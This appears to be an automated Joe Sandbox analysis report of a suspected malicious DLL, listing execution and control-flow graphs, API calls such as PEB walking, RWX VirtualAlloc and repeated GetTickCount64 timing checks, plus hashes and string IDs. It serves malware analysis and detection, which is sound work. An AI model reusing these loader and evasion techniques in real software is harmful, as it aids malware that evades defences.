                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:1.6%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:8%
                                                                                                                                                                                      Signature Coverage:11.3%
                                                                                                                                                                                      Total number of Nodes:300
                                                                                                                                                                                      Total number of Limit Nodes:22

                                                                                                                                                                                      Graph

                                                                                                                                                                                      execution_graph 21184 3d567f 21185 3d5739 21184->21185 21189 3d5760 21184->21189 21190 3eed95 21185->21190 21200 3ef32b 21190->21200 21191 3ef52b 21213 3f06ef GetPEB 21191->21213 21194 3d574c 21194->21189 21203 3df3f7 GetPEB 21194->21203 21199 3f0ad3 GetPEB 21199->21200 21200->21191 21200->21194 21200->21199 21202 3e2eed GetPEB 21200->21202 21204 3e0207 21200->21204 21208 3d6617 GetPEB 21200->21208 21209 3de259 GetPEB 21200->21209 21210 3d24aa GetPEB 21200->21210 21211 3f06a6 GetPEB 21200->21211 21212 3d3965 GetPEB 21200->21212 21202->21200 21203->21189 21205 3e0224 21204->21205 21214 3ee399 21205->21214 21208->21200 21209->21200 21210->21200 21211->21200 21212->21200 21213->21194 21215 3e02da lstrcmpiW 21214->21215 21216 3ee43d 21214->21216 21215->21200 21220 3d89e3 GetPEB 21216->21220 21218 3ee450 21221 3d66c3 GetPEB 21218->21221 21220->21218 21221->21215 21222 6e9eeeaa 21225 6e9efc64 21222->21225 21226 6e9efc72 ___except_validate_context_record 21225->21226 21234 6e9ef3b1 80 API calls CallUnexpected 21226->21234 21228 6e9efc78 21229 6e9efcb7 21228->21229 21232 6e9efcdd 21228->21232 21233 6e9eeed0 21228->21233 21229->21233 21235 6e9f0005 80 API calls __FrameHandler3::FrameUnwindToState 21229->21235 21232->21233 21236 6e9ef6f6 83 API calls 9 library calls 21232->21236 21234->21228 21235->21233 21236->21233 21237 6e9f16b6 21252 6e9f3c92 21237->21252 21242 6e9f16de 21279 6e9f170f 21242->21279 21243 6e9f16d2 21301 6e9f2c83 14 API calls __dosmaperr 21243->21301 21246 6e9f16d8 21249 6e9f1702 21303 6e9f2c83 14 API calls __dosmaperr 21249->21303 21251 6e9f1708 21253 6e9f3c9b 21252->21253 21254 6e9f16c7 21252->21254 21304 6e9f275c 21253->21304 21258 6e9f4161 GetEnvironmentStringsW 21254->21258 21259 6e9f16cc 21258->21259 21260 6e9f4179 21258->21260 21259->21242 21259->21243 21442 6e9f4073 WideCharToMultiByte 21260->21442 21262 6e9f4196 21263 6e9f41ab 21262->21263 21264 6e9f41a0 FreeEnvironmentStringsW 21262->21264 21265 6e9f22e9 15 API calls 21263->21265 21264->21259 21266 6e9f41b2 21265->21266 21267 6e9f41cb 21266->21267 21268 6e9f41ba 21266->21268 21444 6e9f4073 WideCharToMultiByte 21267->21444 21443 6e9f2c83 14 API calls __dosmaperr 21268->21443 21271 6e9f41bf FreeEnvironmentStringsW 21271->21259 21272 6e9f41db 21273 6e9f41ea 21272->21273 21274 6e9f41e2 21272->21274 21446 6e9f2c83 14 API calls __dosmaperr 21273->21446 21445 6e9f2c83 14 API calls __dosmaperr 21274->21445 21277 6e9f41e8 FreeEnvironmentStringsW 21277->21259 21280 6e9f1724 21279->21280 21281 6e9f2c26 _unexpected 14 API calls 21280->21281 21282 6e9f174b 21281->21282 21283 6e9f1753 21282->21283 21292 6e9f175d 21282->21292 21447 6e9f2c83 14 API calls __dosmaperr 21283->21447 21285 6e9f17ba 21450 6e9f2c83 14 API calls __dosmaperr 21285->21450 21287 6e9f2c26 _unexpected 14 API calls 21287->21292 21288 6e9f17c9 21451 6e9f17f1 14 API calls __freea 21288->21451 21291 6e9f17cf 21452 6e9f2c83 14 API calls __dosmaperr 21291->21452 21292->21285 21292->21287 21292->21288 21293 6e9f17e4 21292->21293 21448 6e9f1c67 29 API calls 2 library calls 21292->21448 21449 6e9f2c83 14 API calls __dosmaperr 21292->21449 21454 6e9f2bf2 11 API calls CallUnexpected 21293->21454 21297 6e9f17d6 21453 6e9f2c83 14 API calls __dosmaperr 21297->21453 21299 6e9f17f0 21300 6e9f16e5 21302 6e9f2c83 14 API calls __dosmaperr 21300->21302 21301->21246 21302->21249 21303->21251 21305 6e9f276d 21304->21305 21306 6e9f2767 21304->21306 21325 6e9f2773 21305->21325 21353 6e9f4526 6 API calls _unexpected 21305->21353 21352 6e9f44e7 6 API calls _unexpected 21306->21352 21309 6e9f2787 21309->21325 21354 6e9f2c26 21309->21354 21314 6e9f279f 21361 6e9f4526 6 API calls _unexpected 21314->21361 21315 6e9f27b4 21363 6e9f4526 6 API calls _unexpected 21315->21363 21318 6e9f27c0 21320 6e9f27c4 21318->21320 21321 6e9f27d3 21318->21321 21319 6e9f27ab 21362 6e9f2c83 14 API calls __dosmaperr 21319->21362 21364 6e9f4526 6 API calls _unexpected 21320->21364 21365 6e9f24a3 14 API calls _unexpected 21321->21365 21328 6e9f2778 21325->21328 21367 6e9f1c23 21325->21367 21326 6e9f27de 21366 6e9f2c83 14 API calls __dosmaperr 21326->21366 21329 6e9f3a9d 21328->21329 21394 6e9f3bf2 21329->21394 21336 6e9f3af9 21419 6e9f2c83 14 API calls __dosmaperr 21336->21419 21337 6e9f3b07 21420 6e9f3ced 78 API calls 2 library calls 21337->21420 21340 6e9f3b34 21342 6e9f3b3f 21340->21342 21348 6e9f3b5a 21340->21348 21341 6e9f3ae0 21341->21254 21421 6e9f1fcf 14 API calls __dosmaperr 21342->21421 21344 6e9f3b44 21422 6e9f2c83 14 API calls __dosmaperr 21344->21422 21345 6e9f3b86 21346 6e9f3bcf 21345->21346 21424 6e9f370f 29 API calls 2 library calls 21345->21424 21425 6e9f2c83 14 API calls __dosmaperr 21346->21425 21348->21345 21423 6e9f2c83 14 API calls __dosmaperr 21348->21423 21352->21305 21353->21309 21359 6e9f2c33 _unexpected 21354->21359 21355 6e9f2c73 21379 6e9f1fcf 14 API calls __dosmaperr 21355->21379 21356 6e9f2c5e HeapAlloc 21357 6e9f2797 21356->21357 21356->21359 21357->21314 21357->21315 21359->21355 21359->21356 21378 6e9f0e8e EnterCriticalSection LeaveCriticalSection _unexpected 21359->21378 21361->21319 21362->21325 21363->21318 21364->21319 21365->21326 21366->21328 21380 6e9f49ff 21367->21380 21370 6e9f1c33 21371 6e9f1c5c 21370->21371 21372 6e9f1c3d IsProcessorFeaturePresent 21370->21372 21385 6e9f138d 23 API calls CallUnexpected 21371->21385 21374 6e9f1c49 21372->21374 21384 6e9f29e6 8 API calls 2 library calls 21374->21384 21377 6e9f1c66 21378->21359 21379->21357 21386 6e9f4931 21380->21386 21383 6e9f4a44 70 API calls 5 library calls 21383->21370 21384->21371 21385->21377 21387 6e9f493d ___scrt_is_nonwritable_in_current_image 21386->21387 21392 6e9f228a EnterCriticalSection 21387->21392 21389 6e9f494b 21393 6e9f4989 LeaveCriticalSection CallUnexpected 21389->21393 21391 6e9f1c28 21391->21370 21391->21383 21392->21389 21393->21391 21395 6e9f3bfe ___scrt_is_nonwritable_in_current_image 21394->21395 21396 6e9f3c18 21395->21396 21426 6e9f228a EnterCriticalSection 21395->21426 21398 6e9f3ac7 21396->21398 21401 6e9f1c23 CallUnexpected 70 API calls 21396->21401 21405 6e9f381d 21398->21405 21399 6e9f3c54 21428 6e9f3c71 LeaveCriticalSection CallUnexpected 21399->21428 21403 6e9f3c91 21401->21403 21402 6e9f3c28 21402->21399 21427 6e9f2c83 14 API calls __dosmaperr 21402->21427 21429 6e9f331d 21405->21429 21408 6e9f383e GetOEMCP 21410 6e9f3867 21408->21410 21409 6e9f3850 21409->21410 21411 6e9f3855 GetACP 21409->21411 21410->21341 21412 6e9f22e9 21410->21412 21411->21410 21413 6e9f2327 21412->21413 21417 6e9f22f7 _unexpected 21412->21417 21441 6e9f1fcf 14 API calls __dosmaperr 21413->21441 21414 6e9f2312 HeapAlloc 21416 6e9f2325 21414->21416 21414->21417 21416->21336 21416->21337 21417->21413 21417->21414 21440 6e9f0e8e EnterCriticalSection LeaveCriticalSection _unexpected 21417->21440 21419->21341 21420->21340 21421->21344 21422->21341 21423->21345 21424->21346 21425->21341 21426->21402 21427->21399 21428->21396 21430 6e9f333b 21429->21430 21436 6e9f3334 21429->21436 21430->21436 21437 6e9f26a1 70 API calls 3 library calls 21430->21437 21432 6e9f335c 21438 6e9f5027 70 API calls CallUnexpected 21432->21438 21434 6e9f3372 21439 6e9f5085 70 API calls CallUnexpected 21434->21439 21436->21408 21436->21409 21437->21432 21438->21434 21439->21436 21440->21417 21441->21416 21442->21262 21443->21271 21444->21272 21445->21277 21446->21277 21447->21300 21448->21292 21449->21292 21450->21300 21451->21291 21452->21297 21453->21300 21454->21299 21455 6e9dc2a0 GetModuleHandleA 21456 6e9dc2bc 21455->21456 21457 6e9dc2af GetProcAddress 21455->21457 21461 6e9ec781 21462 6e9ec7bf 21461->21462 21463 6e9ec78c 21461->21463 21489 6e9ec8db 107 API calls 4 library calls 21462->21489 21465 6e9ec7b1 21463->21465 21466 6e9ec791 21463->21466 21473 6e9ec7d4 21465->21473 21467 6e9ec796 21466->21467 21468 6e9ec7a7 21466->21468 21472 6e9ec79b 21467->21472 21487 6e9ecfbc 21 API calls 21467->21487 21488 6e9ecf9d 23 API calls 21468->21488 21474 6e9ec7e0 ___scrt_is_nonwritable_in_current_image 21473->21474 21490 6e9ed02d 21474->21490 21476 6e9ec84a ___scrt_is_nonwritable_in_current_image CallUnexpected 21476->21472 21477 6e9ec7e7 __DllMainCRTStartup@12 21477->21476 21478 6e9ec80e 21477->21478 21479 6e9ec8d3 21477->21479 21501 6e9ecf8f 21478->21501 21509 6e9ed1cc IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 21479->21509 21482 6e9ec8da 21483 6e9ec81d __RTC_Initialize 21483->21476 21504 6e9ecead InitializeSListHead 21483->21504 21485 6e9ec82b 21485->21476 21505 6e9ecf64 21485->21505 21487->21472 21488->21472 21489->21472 21491 6e9ed036 21490->21491 21510 6e9ecc44 IsProcessorFeaturePresent 21491->21510 21493 6e9ed042 21511 6e9ef0dd 10 API calls 2 library calls 21493->21511 21495 6e9ed047 21500 6e9ed04b 21495->21500 21512 6e9f1b65 21495->21512 21498 6e9ed062 21498->21477 21500->21477 21525 6e9ed066 21501->21525 21503 6e9ecf96 21503->21483 21504->21485 21506 6e9ecf69 ___scrt_release_startup_lock 21505->21506 21508 6e9ecf72 21506->21508 21532 6e9ecc44 IsProcessorFeaturePresent 21506->21532 21508->21476 21509->21482 21510->21493 21511->21495 21516 6e9f4898 21512->21516 21515 6e9ef112 7 API calls 2 library calls 21515->21500 21517 6e9f48a8 21516->21517 21518 6e9ed054 21516->21518 21517->21518 21520 6e9f475c 21517->21520 21518->21498 21518->21515 21524 6e9f4763 21520->21524 21521 6e9f47a6 GetStdHandle 21521->21524 21522 6e9f4808 21522->21517 21523 6e9f47b9 GetFileType 21523->21524 21524->21521 21524->21522 21524->21523 21526 6e9ed076 21525->21526 21527 6e9ed072 21525->21527 21530 6e9ed083 ___scrt_release_startup_lock 21526->21530 21531 6e9ed1cc IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 21526->21531 21527->21503 21529 6e9ed0ec 21530->21503 21531->21529 21532->21508 21533 6e9ecac1 21534 6e9ecacf 21533->21534 21535 6e9ecaca 21533->21535 21539 6e9ec98b 21534->21539 21554 6e9ece62 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 21535->21554 21541 6e9ec997 ___scrt_is_nonwritable_in_current_image 21539->21541 21540 6e9ec9a6 21541->21540 21542 6e9ec9c0 dllmain_raw 21541->21542 21543 6e9ec9bb 21541->21543 21542->21540 21544 6e9ec9da dllmain_crt_dispatch 21542->21544 21555 6e9d1290 21543->21555 21544->21540 21544->21543 21546 6e9ec9fb 21547 6e9eca2c 21546->21547 21550 6e9d1290 __DllMainCRTStartup@12 38 API calls 21546->21550 21547->21540 21548 6e9eca35 dllmain_crt_dispatch 21547->21548 21548->21540 21549 6e9eca48 dllmain_raw 21548->21549 21549->21540 21551 6e9eca13 21550->21551 21569 6e9ec8db 107 API calls 4 library calls 21551->21569 21553 6e9eca21 dllmain_raw 21553->21547 21554->21534 21556 6e9d143c 21555->21556 21557 6e9d12d2 21555->21557 21556->21546 21570 6e9ebe60 21557->21570 21560 6e9d1345 HeapAlloc 21562 6e9d144f __DllMainCRTStartup@12 21560->21562 21566 6e9d135a __DllMainCRTStartup@12 21560->21566 21561 6e9d1333 GetProcessHeap 21561->21562 21563 6e9d1340 21561->21563 21598 6e9d1000 HeapFree 21562->21598 21563->21560 21565 6e9d1476 21565->21546 21583 6e9ec050 21566->21583 21568 6e9d142a HeapFree 21568->21556 21569->21553 21599 6e9ec510 GetTickCount64 21570->21599 21572 6e9ebe77 21573 6e9ec510 __DllMainCRTStartup@12 GetTickCount64 21572->21573 21574 6e9ebe86 21573->21574 21575 6e9ebe96 GetTickCount64 21574->21575 21575->21575 21576 6e9ebeaf 21575->21576 21577 6e9ebeb4 GetTickCount64 21576->21577 21577->21577 21578 6e9ebecd GetTickCount64 GetTickCount64 21577->21578 21579 6e9ebed6 GetTickCount64 21578->21579 21579->21579 21580 6e9ebeef 21579->21580 21581 6e9ebef4 GetTickCount64 21580->21581 21581->21581 21582 6e9d12f6 21581->21582 21582->21560 21582->21561 21601 6e9ec70e 21583->21601 21585 6e9ec074 GetPEB 21588 6e9ec0ce CreateFileA GetLastError VirtualAlloc 21585->21588 21590 6e9ec258 __DllMainCRTStartup@12 21588->21590 21589 6e9ec4cb 21613 6e9ec717 5 API calls ___raise_securityfailure 21589->21613 21590->21589 21593 6e9ec492 21590->21593 21592 6e9ec4e7 21592->21568 21594 6e9ec49e 21593->21594 21611 6e9ebfe0 GetPEB GetPEB 21593->21611 21612 6e9ec717 5 API calls ___raise_securityfailure 21594->21612 21597 6e9ec4c7 21597->21568 21598->21565 21600 6e9ec578 21599->21600 21600->21572 21603 6e9ecaf2 21601->21603 21604 6e9ecb11 21603->21604 21607 6e9ecb13 __DllMainCRTStartup@12 21603->21607 21614 6e9f0e8e EnterCriticalSection LeaveCriticalSection _unexpected 21603->21614 21615 6e9f0f17 15 API calls 2 library calls 21603->21615 21604->21585 21606 6e9ed489 __DllMainCRTStartup@12 21617 6e9ee95c RaiseException 21606->21617 21607->21606 21616 6e9ee95c RaiseException 21607->21616 21610 6e9ed4a6 21610->21585 21611->21594 21612->21597 21613->21592 21614->21603 21615->21603 21616->21606 21617->21610

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 50 3eed95-3ef323 51 3ef32b-3ef331 50->51 52 3ef4ed-3ef518 call 3d3965 51->52 53 3ef337-3ef33d 51->53 65 3ef51d-3ef523 52->65 54 3ef52b-3ef553 call 3f06ef 53->54 55 3ef343-3ef349 53->55 66 3ef554-3ef560 54->66 57 3ef34f-3ef355 55->57 58 3ef485-3ef4b9 call 3f0ad3 call 3e0207 55->58 63 3ef35b-3ef361 57->63 64 3ef440-3ef446 57->64 79 3ef4be-3ef4eb call 3e2eed 58->79 68 3ef388-3ef43b call 3de259 call 3d24aa call 3f0ad3 call 3f06a6 call 3e2eed 63->68 69 3ef363-3ef369 63->69 70 3ef47b-3ef480 64->70 71 3ef448-3ef44c 64->71 65->51 72 3ef529 65->72 68->51 69->65 74 3ef36f-3ef386 call 3d6617 69->74 70->51 75 3ef44e-3ef455 71->75 76 3ef473-3ef479 71->76 72->66 74->51 81 3ef463-3ef46c 75->81 76->70 76->71 79->65 85 3ef46e-3ef470 81->85 86 3ef457-3ef45b 81->86 85->76 86->85 89 3ef45d-3ef460 86->89 89->81
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: , ;$H%R$N8^$vD$?D$?D$c
                                                                                                                                                                                      • API String ID: 0-926347615
                                                                                                                                                                                      • Opcode ID: 99cdd63762328aeb8043361fbc38489f185a51a6ee77db209a91b373e6c912c0
                                                                                                                                                                                      • Instruction ID: 9d7e335d1e769838f16da6887678e3ba4c21699c18a3c0445c02d386b50f773d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 99cdd63762328aeb8043361fbc38489f185a51a6ee77db209a91b373e6c912c0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 011212725093809FD368CF26C54AA5BBBF2FBC1718F108A1DE1D9862A1D7B58948CF53
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 122 6e9ec050-6e9ec090 call 6e9ec70e 125 6e9ec094-6e9ec097 122->125 126 6e9ec0af-6e9ec0b0 125->126 127 6e9ec099-6e9ec0a4 125->127 126->125 127->126 128 6e9ec0a6-6e9ec0ad 127->128 128->126 129 6e9ec0b2-6e9ec0c8 GetPEB 128->129 130 6e9ec0ce 129->130 131 6e9ec1dc-6e9ec256 CreateFileA GetLastError VirtualAlloc 129->131 132 6e9ec0d0-6e9ec0d9 130->132 145 6e9ec26e-6e9ec27a 131->145 146 6e9ec258-6e9ec25c 131->146 134 6e9ec0e0-6e9ec0e9 132->134 135 6e9ec0ee-6e9ec0fa 134->135 136 6e9ec0eb 134->136 135->134 138 6e9ec0fc-6e9ec102 135->138 136->135 139 6e9ec108-6e9ec125 138->139 140 6e9ec1b7-6e9ec1bc 138->140 144 6e9ec127-6e9ec12f 139->144 142 6e9ec1be-6e9ec1c0 140->142 143 6e9ec1c9-6e9ec1d2 140->143 142->143 147 6e9ec1c2-6e9ec1c7 142->147 143->132 149 6e9ec1d8 143->149 148 6e9ec130-6e9ec13f 144->148 151 6e9ec2bc-6e9ec2d0 145->151 152 6e9ec27c-6e9ec27f 145->152 150 6e9ec260-6e9ec26c 146->150 147->143 147->149 148->148 153 6e9ec141-6e9ec146 148->153 149->131 150->145 150->150 155 6e9ec2d6-6e9ec2d9 151->155 156 6e9ec365-6e9ec38f 151->156 154 6e9ec280-6e9ec2a3 152->154 157 6e9ec148-6e9ec14d 153->157 158 6e9ec156-6e9ec168 153->158 162 6e9ec2b5-6e9ec2ba 154->162 163 6e9ec2a5-6e9ec2b3 154->163 155->156 164 6e9ec2df-6e9ec2f8 155->164 180 6e9ec43e-6e9ec455 156->180 181 6e9ec395-6e9ec3a6 156->181 157->158 159 6e9ec14f-6e9ec154 157->159 160 6e9ec16a-6e9ec173 158->160 161 6e9ec175-6e9ec17a 158->161 159->158 165 6e9ec1a0-6e9ec1a9 159->165 166 6e9ec19a 160->166 167 6e9ec17c-6e9ec185 161->167 168 6e9ec187-6e9ec18c 161->168 162->151 162->154 163->162 163->163 173 6e9ec2fa 164->173 174 6e9ec34b-6e9ec35f 164->174 165->144 172 6e9ec1af-6e9ec1b3 165->172 166->165 167->166 168->166 171 6e9ec18e-6e9ec196 168->171 171->166 172->140 176 6e9ec300-6e9ec302 173->176 174->155 174->156 178 6e9ec326-6e9ec32e 176->178 179 6e9ec304-6e9ec308 176->179 186 6e9ec333-6e9ec349 178->186 179->178 182 6e9ec30a-6e9ec324 179->182 183 6e9ec476-6e9ec47e 180->183 184 6e9ec457-6e9ec45d 180->184 181->180 185 6e9ec3ac 181->185 182->186 189 6e9ec4cb-6e9ec4cf 183->189 190 6e9ec480-6e9ec490 call 6e9ebf10 183->190 184->183 187 6e9ec45f-6e9ec463 184->187 188 6e9ec3b0-6e9ec3bc 185->188 186->174 186->176 187->183 191 6e9ec465-6e9ec474 187->191 192 6e9ec3be 188->192 193 6e9ec425-6e9ec434 188->193 197 6e9ec4d4-6e9ec4ea call 6e9ec717 189->197 190->197 203 6e9ec492-6e9ec496 190->203 191->183 196 6e9ec3c0-6e9ec3d2 192->196 193->188 195 6e9ec43a 193->195 195->180 200 6e9ec3df-6e9ec3e3 196->200 201 6e9ec3d4-6e9ec3dd 196->201 205 6e9ec3e5-6e9ec3ee 200->205 206 6e9ec3f0-6e9ec3f4 200->206 204 6e9ec417-6e9ec41c 201->204 208 6e9ec498-6e9ec49e call 6e9ebfe0 203->208 209 6e9ec4a1-6e9ec4ca call 6e9ec717 203->209 204->196 213 6e9ec41e-6e9ec422 204->213 205->204 210 6e9ec3f6-6e9ec405 206->210 211 6e9ec407-6e9ec40b 206->211 208->209 210->204 211->204 215 6e9ec40d-6e9ec413 211->215 213->193 215->204
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E9EC225
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9EC22B
                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6E9EC247
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocCreateErrorFileLastVirtual
                                                                                                                                                                                      • String ID: asd
                                                                                                                                                                                      • API String ID: 1112224254-4170839921
                                                                                                                                                                                      • Opcode ID: fddf2d6bbf969dcd7ea892298121c6a0753feb6770501003be214293c0b03f7a
                                                                                                                                                                                      • Instruction ID: a3cd8dba142dc6233869d4eb5f8af48549fcb6ebe0fc209cc509092714675bc2
                                                                                                                                                                                      • Opcode Fuzzy Hash: fddf2d6bbf969dcd7ea892298121c6a0753feb6770501003be214293c0b03f7a
                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE1BA71A083468FCB51CF98C880B2ABBE5BF88704F19496DEA959F745E331E845CF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 226 6e9d1290-6e9d12cc 227 6e9d143c-6e9d144c 226->227 228 6e9d12d2-6e9d1331 call 6e9ebe60 226->228 231 6e9d1345-6e9d1354 HeapAlloc 228->231 232 6e9d1333-6e9d133a GetProcessHeap 228->232 233 6e9d144f-6e9d147a call 6e9f92f0 call 6e9d1000 231->233 235 6e9d135a-6e9d137b call 6e9ed4d0 231->235 232->233 234 6e9d1340 232->234 234->231 240 6e9d1380-6e9d138d 235->240 243 6e9d1390-6e9d13b1 240->243 243->243 244 6e9d13b3-6e9d13bc 243->244 244->240 245 6e9d13be-6e9d13cc 244->245 246 6e9d13d0-6e9d13da 245->246 247 6e9d13e0-6e9d1408 246->247 247->247 248 6e9d140a-6e9d1413 247->248 248->246 249 6e9d1415-6e9d1425 call 6e9ec050 248->249 251 6e9d142a-6e9d1437 HeapFree 249->251 251->227
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBE96
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBEB4
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBECD
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBECF
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBED6
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBEF4
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9D1333
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,00023800), ref: 6E9D134D
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 6E9D1437
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Count64Tick$Heap$AllocFreeProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2047189075-0
                                                                                                                                                                                      • Opcode ID: 282d8092b573d618e6732bc1ffe8e0ceefa167b362b3b604f070d827b940235a
                                                                                                                                                                                      • Instruction ID: d44e6ea67d34579b52c8e8991a720725a8b98f521578577a4111b943f409df94
                                                                                                                                                                                      • Opcode Fuzzy Hash: 282d8092b573d618e6732bc1ffe8e0ceefa167b362b3b604f070d827b940235a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5551B075A04B508BD321CF69D940A96BBF8FF59314F108A2DE9D68BA91E730F549CB80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 6E9EC922
                                                                                                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 6E9EC93C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2442719207-0
                                                                                                                                                                                      • Opcode ID: 2f3bd84f98e6af6ba924af37edf7ef105ae159db329885e45c55e037f8de656a
                                                                                                                                                                                      • Instruction ID: 0b1b04845117fac7accd0f08144f0fd831089a93afa5fa47c00b8e5fecf14dc6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f3bd84f98e6af6ba924af37edf7ef105ae159db329885e45c55e037f8de656a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 96419072D04695AFDB528FE98900BEE3EADEF95754F004919EA947F640C730C9418F90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
